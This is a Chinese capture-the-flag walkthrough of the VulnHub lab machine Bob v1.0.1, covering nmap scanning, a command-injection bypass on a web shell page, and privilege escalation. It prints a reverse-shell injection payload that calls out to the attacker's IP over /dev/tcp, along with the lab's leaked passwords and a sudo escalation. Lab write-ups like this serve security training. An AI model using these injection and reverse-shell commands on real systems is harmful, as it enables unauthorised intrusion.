vulnbub系列:Bob_v1.0.1
一、信息收集
nmap扫描存活,根据mac地址确定IP
nmap 192.168.23.0/24
nmap扫描端口,开放端口80、25468,ssh端口改为了25468
nmap 192.168.23.174 -p- -sV -Pn -O
dirb目录扫描,没啥发现,一个robots文件,看看内容
访问80端口
到处点了点,没什么发现,查看robots.txt
逐个拼接访问,dev_shell.php,是一个命令执行的页面
lat_memo.html,这里提到网站有一个webshell,但是认为它是安全的
passwords.html
dev_shell.php页面发现存在过滤,一些命令无法执行
执行whoami | ls,发现一个备份文件
whoami | ls
下载下来,查看文件内容,看到过滤了一些命令
二、getshell
直接尝试反弹shell
pwd&echo "bash -i >& /dev/tcp/192.168.23.133/4444 0>&1" | bash
成功反弹shell
三、提权
到home目录下,查看,发现有四个用户的家目录
先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html
查看文件,得到 jc 和 seb 的密码
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret
在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh
查看文件内容
没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES
HARPOCRATES
解密 login.txt.gpg ,没有权限
gpg -d login.txt.gpg
ssh登录其他用户尝试
ssh jc@192.168.23.174 -p 25468
再次解密
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
得到 bob 的密码
bob:b0bcat_
再看看 elliot 的家目录,发现一个 theadminisdumb.txt 文件
查看内容,这里提到他把密码改为了 theadminisdumb
elliot:theadminisdumb
ssh连接bob用户
ssh bob@192.168.23.174 -p 25468
查看当前权限,显示为all,所有命令都可以
sudo -l
直接sudo su,提权成功
sudo su